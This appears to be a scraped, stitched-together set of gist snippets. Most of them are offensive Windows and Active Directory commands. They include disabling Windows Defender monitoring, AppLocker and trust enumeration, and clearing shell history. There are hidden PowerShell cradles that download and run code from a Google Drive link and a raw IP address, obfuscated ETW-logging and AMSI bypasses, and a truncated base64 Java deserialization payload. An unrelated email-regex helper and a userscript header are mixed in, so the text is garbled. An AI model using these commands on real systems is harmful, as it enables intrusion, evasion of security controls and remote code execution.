Note: I did not author this; I found it somewhere.
- Tools
- Most common paths to AD compromise
- GPO - Pivoting with Local Admin
$session=New-PSSession –Computername Server1 | |
Enter-PSSession $session | |
Set-MpPreference -DisableRealtimeMonitoring $true | |
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections | |
$ExecutionContext.SessionState.LanguageMode | |
# Enumerate the AppLocker policy if you stumble upon Constrained Language Mode.
# I forked this from somewhere but I forgot where; it had a regex bug which I fixed.
import re | |
# File names and separators used by this script. The names suggest the first
# is read and the second written, but the I/O code itself is not in view here.
fileToRead, fileToWrite = 'emails.txt', 'emailExtracted.txt'
# Characters that may separate several addresses on one input line (presumably;
# the splitting code is not shown).
delimiterInFile = list(',;')
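def validateEmail(strEmail):
    """Return True if ``strEmail`` looks like ``<text>@<text>.<text>``.

    The check is deliberately loose: ``.*`` matches zero or more characters of
    any kind, so any string containing an ``@`` followed somewhere later by a
    ``.`` passes (even ``"@."``). ``re.match`` anchors only at the start, so
    trailing content is never rejected. This is a filter, not RFC validation.

    Args:
        strEmail: candidate e-mail address (a str).

    Returns:
        True when the pattern matches, False otherwise. The original fell
        through and returned None on a non-match; False keeps the same
        truthiness for callers.
    """
    # Raw string: in a normal string literal "\." is an invalid escape
    # sequence (DeprecationWarning, SyntaxWarning on Python 3.12+); the regex
    # itself is unchanged.
    return re.match(r"(.*)@(.*)\.(.*)", strEmail) is not None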
Retrieves all of the trust relationships for the current domain; does not include forest trusts.
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships() | |
Retrieves the forest trusts (the forest-level counterpart of the command above).
([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).GetAllTrustRelationships() | |
Note: I did not author this; I found it somewhere.
echo "" > ~/.zsh_history & exec $SHELL -l | |
CLEARS ZSH HISTORY ^^ |
powershell.exe -command PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('https://drive.google.com/uc?export=download&id=0B1NUTMCAOKBTdVQzTXlUNHBmZUU',"$env:APPDATA\ps.exe");Start-Process ("$env:APPDATA\ps.exe") | |
## Version1 | |
c:\Windows\System32\cmd.exe /c powershell.exe -w hidden -noni -nop -c "iex(New-Object System.Net.WebClient).DownloadString('http://45.58.34.196:8080/p')" | |
## Version2 | |
c:\windows\system32\cmd.exe /c PowErsHelL.EXE -eXecUtiONPoLICy bYPass -NOPROfilE -WinDoWSTYlE hiDden -EnCodeDcOmmAnd IAAoAE4AZQB3AC0ATwBiAEoAZQBDAFQAIABzAFkAcwB0AEUAbQAuAG4AZQBUAC4AdwBlAGIAQwBsAEkARQBOAFQAKQAuAEQATwBXAG4AbABvAGEAZABGAEkAbABlACgAIAAdIGgAdAB0AHAAcwA6AC8ALwBqAHQAYQBiA |
# Logging bypass: | |
(({}).gettype())."aSs`emblY"."Getty`PE"(('System.Manage'+'ment.Automati'+'on.Trac'+'ing.P'+'SEtwL'+'og'+'Pro'+'vi'+'d'+'e'+'r'))."gEtf`ieLD"(('etwProvi'+'de'+'r'),('Non'+'P'+'ublic,Static'))."Se`TVAL`Ue"($null,(New-Object System.Diagnostics.Eventing.EventProvider(New-Guid))) | |
# AMSI Bypass (old, burned) | |
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} ) | |
# New AMSI bypass obfuscation: |
// Disables Windows Defender real-time monitoring (not the whole product)
Set-MpPreference -DisableRealtimeMonitoring $true |
// ==UserScript== | |
// @name fckcustoms | |
// @namespace http://tampermonkey.net/ | |
// @version 0.1 | |
// @description Customs are literally scammers | |
// @author You | |
// @require http://code.jquery.com/jquery-3.4.1.min.js | |
// @match https://www.amazon.com/gp/your-account/order-details* | |
// @run-at document-body | |
// @grant none |
rO0ABXNyAElvcmcuc3ByaW5nZnJhbWV3b3JrLmNvcmUuU2VyaWFsaXphYmxlVHlwZVdyYXBwZXIkTWV0aG9kSW52b2tlVHlwZVByb3ZpZGVyskq0B4tBGtcCAANJAAVpbmRleEwACm1ldGhvZE5hbWV0ABJMamF2YS9sYW5nL1N0cmluZztMAAhwcm92aWRlcnQAP0xvcmcvc3ByaW5nZnJhbWV3b3JrL2NvcmUvU2VyaWFsaXphYmxlVHlwZVdyYXBwZXIkVHlwZVByb3ZpZGVyO3hwAAAAAHQADm5ld1RyYW5zZm9ybWVyc30AAAABAD1vcmcuc3ByaW5nZnJhbWV3b3JrLmNvcmUuU2VyaWFsaXphYmxlVHlwZVdyYXBwZXIkVHlwZVByb3ZpZGVyeHIAF2phdmEubGFuZy5yZWZsZWN0LlByb3h54SfaIMwQQ8sCAAFMAAFodAAlTGphdmEvbGFuZy9yZWZsZWN0L0ludm9jYXRpb25IYW5kbGVyO3hwc3IAMnN1bi5yZWZsZWN0LmFubm90YXRpb24uQW5ub3RhdGlvbkludm9jYXRpb25IYW5kbGVyVcr1DxXLfqUCAAJMAAxtZW1iZXJWYWx1ZXN0AA9MamF2YS91dGlsL01hcDtMAAR0eXBldAARTGphdmEvbGFuZy9DbGFzczt4cHNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABdAAHZ2V0VHlwZXN9AAAAAgAWamF2YS5sYW5nLnJlZmxlY3QuVHlwZQAdamF2YXgueG1sLnRyYW5zZm9ybS5UZW1wbGF0ZXN4cQB+AAZzcgBgb3JnLnNwcmluZ2ZyYW1ld29yay5iZWFucy5mYWN0b3J5LnN1cHBvcnQuQXV0b3dpcmVVdGlscyRPYmplY3RGYWN0b3J5RGVsZWdhdGluZ0ludm9jYXRpb25IYW5kbGVy |